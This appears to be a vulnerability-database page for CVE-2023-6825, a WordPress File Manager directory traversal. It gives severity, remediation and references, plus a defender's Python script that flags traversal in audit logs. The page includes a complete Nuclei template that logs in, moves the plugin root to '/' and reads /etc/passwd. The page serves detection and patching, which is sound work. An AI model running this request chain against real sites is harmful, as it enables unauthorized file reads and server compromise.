
WordPress File Manager <= 7.2.1 - Directory Traversal

CVE-2023-6825
Verified

Description

The File Manager (up to 7.2.1) and File Manager Pro (up to 8.3.4) plugins for WordPress contain a directory traversal via the 'target' parameter of mk_file_folder_manager_action_callback_shortcode, which lets an attacker read arbitrary files and upload files outside the designated directories. In the free version exploitation requires administrator privileges; in the Pro version lower-privileged users can exploit it.

Severity

Critical

CVSS Score

9.9

Exploit Probability

66%

Affected Product

file-manager

Published Date

April 8, 2026

Template Author

pussycat0x

CVE-2023-6825.yaml
id: CVE-2023-6825

info:
  name: WordPress File Manager <= 7.2.1 - Directory Traversal
  author: pussycat0x
  severity: critical
  description: |
    The File Manager (up to 7.2.1) and File Manager Pro (up to 8.3.4) plugins for WordPress contain a directory traversal via the 'target' parameter of mk_file_folder_manager_action_callback_shortcode, which lets an attacker read arbitrary files and upload files outside the designated directories. In the free version exploitation requires administrator privileges; in the Pro version lower-privileged users can exploit it.
  impact: |
    Attackers can read sensitive files and upload files outside permitted directories, potentially leading to information disclosure and server compromise.
  remediation: |
    Update to the latest versions of the plugins, beyond 7.2.1 for free and 8.3.4 for Pro, or disable the plugins until patched.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/93f377a1-2c33-4dd7-8fd6-190d9148e804
    - https://plugins.trac.wordpress.org/changeset/3023403
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
    cvss-score: 9.9
    cve-id: CVE-2023-6825
    epss-score: 0.66498
    epss-percentile: 0.98551
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 5
    vendor: mndpsingh287
    product: file-manager
    shodan-query: http.component:"WordPress"
    fofa-query: body="wp-file-manager"
  tags: cve,cve2023,wordpress,wp-plugin,wp-file-manager,lfi

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-file-manager/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "File Manager")'
          - 'compare_versions(version, "<= 7.2.1")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - '(?i)Stable\s+tag:\s*([0-9.]+)'
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1

      - |
        GET /wp-admin/admin.php?page=wp_file_manager_preferences HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin.php?page=wp_file_manager_preferences HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        public_path=%2F&wp_filemanager_root_nonce_field={{pref_nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwp_file_manager_preferences&submit=Save+Changes

      - |
        GET /wp-admin/admin.php?page=wp_file_manager HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=mk_file_folder_manager&cmd=get&target=l1_ZXRjL3Bhc3N3ZA&_wpnonce={{fm_nonce}}

    redirects: true
    max-redirects: 3

    extractors:
      - type: regex
        name: pref_nonce
        part: body_2
        group: 1
        regex:
          - 'wp_filemanager_root_nonce_field"[^>]*value="([a-f0-9]+)"'
        internal: true

      - type: regex
        name: fm_nonce
        part: body_4
        group: 1
        regex:
          - '"nonce"\s*:\s*"([a-f0-9]+)"'
        internal: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_5 == 200'
          - 'regex("root:.*:0:0:", body_5)'
        condition: and
# digest: 4b0a00483046022100f94720db7f27935136c75c3e9b6c3747fae63e3fd080fe32efd7267670077b1d022100c211a9b513ad8ea6ab124e0632029df7b2d0b50831a5dd5df168259c0d7897e1:922c64590222798bb761d5b6d8e72950
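Added here as a defender's triage example (not part of the template above or of the plugin): it decodes elFinder-style target hashes such as the one in the template's last request and flags requests whose target, or a changed public_path, leaves the plugin's default root. It assumes an audit log that captures form parameters (for example a WAF log) in a constructed "<client> <path> <body>" format and a default root of wp-content/uploads; the hash format (volume id prefix plus base64 with '+/=' mapped to '-_.') is elFinder's.

```python
import base64, posixpath, re
from urllib.parse import parse_qs

# Assumed default root for the plugin, site-relative (constructed for this example).
DEFAULT_ROOT = "wp-content/uploads"

# Constructed audit lines "<client> <request path> <form body>"; the last target is the template's own.
AUDIT_LINES = [
    "203.0.113.7 /wp-admin/admin-ajax.php action=mk_file_folder_manager&cmd=get&target=l1_MjAyNC9waG90by5qcGc",
    "203.0.113.7 /wp-admin/admin-ajax.php action=mk_file_folder_manager&cmd=get&target=l1_Li4vLi4vd3AtY29uZmlnLnBocA",
    "198.51.100.5 /wp-admin/admin.php?page=wp_file_manager_preferences public_path=%2F&submit=Save+Changes",
    "198.51.100.5 /wp-admin/admin-ajax.php action=mk_file_folder_manager&cmd=get&target=l1_ZXRjL3Bhc3N3ZA",
]

def decode_target(target):
    """Decode an elFinder hash ('<volume id>_<base64 with +/= as -_.>') to its volume-relative path."""
    m = re.fullmatch(r"[a-z]+\d*_([A-Za-z0-9_.-]*)", target)
    if not m:
        return None
    b64 = m.group(1).replace("-", "+").replace("_", "/").rstrip(".")
    b64 += "=" * (-len(b64) % 4)  # elFinder strips the padding; restore it
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None

def inside(path, root=DEFAULT_ROOT):
    """True when a normalized site-relative path stays under root (absolute paths never do)."""
    return not path.startswith("/") and (path == root or path.startswith(root + "/"))

def triage(audit_lines):
    """Return (client, reason, path) findings, tracking public_path since the PoC moves the root to '/' first."""
    root, findings = DEFAULT_ROOT, []
    for line in audit_lines:
        client, path, body = line.split(" ", 2)
        p = {k: v[0] for k, v in parse_qs(body).items()}
        if "page=wp_file_manager_preferences" in path and "public_path" in p:
            root = posixpath.normpath(p["public_path"].lstrip("/"))  # stored relative to ABSPATH (assumed)
            if not inside(root):
                findings.append((client, "root moved outside default", root))
        elif p.get("action") == "mk_file_folder_manager" and "target" in p:
            rel = decode_target(p["target"])
            if rel is None:
                findings.append((client, "undecodable target", p["target"]))
                continue
            resolved = rel if rel.startswith("/") else posixpath.normpath(posixpath.join(root, rel))
            if not inside(resolved):
                findings.append((client, "target outside default root", resolved))
    return findings
```

Because the root preference is site-wide, the script keeps one root across clients; the benign photo request produces no finding while the traversal, the root change and the subsequent passwd read each do.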
CVSS Metrics

Score: 9.9
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
CVE ID: CVE-2023-6825
CWE ID: CWE-22

References

https://www.wordfence.com/threat-intel/vulnerabilities/id/93f377a1-2c33-4dd7-8fd6-190d9148e804
https://plugins.trac.wordpress.org/changeset/3023403

Remediation Steps

Update to the latest versions of the plugins, beyond 7.2.1 for free and 8.3.4 for Pro, or disable the plugins until patched.